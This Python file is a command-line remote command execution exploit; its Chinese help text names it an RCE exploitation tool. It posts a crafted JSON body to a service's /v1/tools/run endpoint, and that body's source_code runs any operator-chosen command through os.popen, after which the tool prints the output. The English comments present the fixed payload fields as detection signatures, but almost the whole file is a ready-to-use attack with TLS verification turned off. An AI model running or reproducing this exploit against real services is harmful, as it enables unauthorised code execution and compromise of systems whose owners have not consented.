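"""Command-line client that sends one crafted POST to a ``/v1/tools/run``
endpoint and prints whatever the service returns.

What goes over the wire (see ``send_exploit``): a JSON body whose
``source_code`` field defines a function wrapping the user-supplied command in
``os.popen(...).read()``, plus fixed ``args`` / ``json_schema`` / ``env_vars`` /
``name`` fields and a fixed desktop-browser User-Agent.  Those constant values
are the concrete things an operator of such a service can log, alert on or
reject at the request boundary.  All user-facing strings are kept in the
original Chinese; only comments and docstrings are in English.
"""
import argparse
import json
import platform
import sys

import requests


class ExploitTool:
    """Parse CLI arguments, send the request once and render the result."""

    def __init__(self):
        self.on_windows = platform.system() == "Windows"
        self.setup_colors()
        self.parser = self.setup_args()
        # `-u` is required, so argparse exits (status 2) on a bare invocation
        # before any `len(sys.argv) == 1` check in __main__ could run; handle
        # the empty command line here so the full help text is shown instead.
        if len(sys.argv) == 1:
            self.parser.print_help()
            sys.exit(1)
        self.args = self.parser.parse_args()

    def setup_colors(self):
        """Set the ANSI colour prefixes used in output.

        On Windows the prefixes are empty strings, so output stays readable on
        consoles that do not interpret escape sequences.
        """
        if self.on_windows:
            self.SUCCESS = ""
            self.ERROR = ""
            self.WARNING = ""
            self.INFO = ""
            self.RESET = ""
        else:
            self.SUCCESS = "\033[92m"  # green
            self.ERROR = "\033[91m"  # red
            self.WARNING = "\033[93m"  # yellow
            self.INFO = "\033[94m"  # blue
            self.RESET = "\033[0m"  # reset

    def setup_args(self):
        """Build and return the argument parser (help strings unchanged)."""
        parser = argparse.ArgumentParser(description='远程命令执行漏洞利用工具')
        parser.add_argument('-u', '--url', required=True,
                            help='目标URL (例如: http://192.168.1.100:8000)')
        parser.add_argument('-c', '--command', default='id',
                            help='要执行的命令 (默认: id)')
        parser.add_argument('-d', '--debug', action='store_true',
                            help='启用详细调试输出')
        return parser

    def send_exploit(self, target_url, command):
        """POST the crafted payload to ``<target_url>/v1/tools/run``.

        Args:
            target_url: Base URL of the service; a trailing slash is stripped.
            command: Pasted verbatim into the generated ``source_code`` string.

        Returns:
            The ``requests.Response``.  Transport errors surface as
            ``requests.RequestException`` and are handled in ``run``.
        """
        endpoint = f"{target_url.rstrip('/')}/v1/tools/run"
        # The service is asked to run this source; the os.popen(...) wrapper
        # and the fixed "env_vars"/"name"/"json_schema" values are the most
        # specific request-body features available for detection rules.
        payload = {
            "source_code": f"def test():\n import os\n return os.popen('{command}').read()",
            "args": {},
            "json_schema": {"title": "test", "type": "object", "properties": {}},
            "env_vars": {"PYTHONPATH": "/usr/lib/python3/dist-packages"},
            "name": "test",
        }
        # Constant headers: the User-Agent string never varies between runs.
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36",
            "Connection": "close",
            "Content-Type": "application/json",
        }
        # verify=False disables TLS certificate validation: over HTTPS the
        # exchange can be read or altered by anyone on the network path, and
        # urllib3 emits InsecureRequestWarning.  Kept as in the original.
        return requests.post(endpoint, json=payload, headers=headers, verify=False, timeout=15)

    def parse_response(self, response):
        """Render ``response`` as a coloured, human-readable string.

        Four cases: HTTP 200 with ``tool_return``; HTTP 200 without it (the
        JSON is dumped); non-200 status (raw text); and a body that is not JSON.
        ``ValueError`` is caught rather than ``json.JSONDecodeError`` because it
        is the common base of the decode errors ``response.json()`` can raise
        (``json.JSONDecodeError`` and the ``requests``/``simplejson`` variants),
        so a non-JSON body is always reported rather than escaping to ``run``.
        """
        try:
            if response.status_code == 200:
                resp_data = response.json()
                if "tool_return" in resp_data:
                    return f"{self.SUCCESS}[+] 命令执行成功:{self.RESET}\n{resp_data['tool_return'].strip()}"
                return f"{self.WARNING}[!] 响应中未包含预期结果{self.RESET}\n{json.dumps(resp_data, indent=2)}"
            return f"{self.ERROR}[-] 请求失败 (HTTP {response.status_code}){self.RESET}\n{response.text}"
        except ValueError:
            return f"{self.ERROR}[-] 响应解析失败{self.RESET}\n{response.text[:1000]}"

    def debug_output(self, response, command, url):
        """Return a multi-line debug dump: URL, command, status and body.

        The body is pretty-printed when it is JSON and shown raw otherwise.
        The outer ``except Exception`` is a deliberate best-effort fallback
        that truncates the raw text to 2000 characters.
        """
        output = [
            f"{self.INFO}[*] 调试信息{self.RESET}",
            f"- 目标URL: {url}",
            f"- 执行命令: '{command}'",
        ]
        try:
            output.append(f"- 状态码: {response.status_code}")
            if response.text:
                try:
                    output.append(f"- 响应内容:\n{json.dumps(response.json(), indent=2)}")
                except ValueError:  # not JSON (was a bare except)
                    output.append(f"- 响应内容:\n{response.text}")
            else:
                output.append("- 响应内容: 空")
        except Exception:
            output.append(f"- 响应内容:\n{response.text[:2000]}")
        return "\n".join(output)

    def run(self):
        """Send the request and print either the parsed result or the debug dump."""
        try:
            response = self.send_exploit(self.args.url, self.args.command)
            if self.args.debug:
                print(self.debug_output(response, self.args.command, self.args.url))
            else:
                print(self.parse_response(response))
        except requests.RequestException as e:
            print(f"{self.ERROR}[-] 请求失败: {e}{self.RESET}")
        except Exception as e:
            # Top-level boundary: report and return rather than traceback.
            print(f"{self.ERROR}[-] 发生未知错误: {e}{self.RESET}")


if __name__ == "__main__":
    # The bare-invocation help path now lives in ExploitTool.__init__.
    ExploitTool().run()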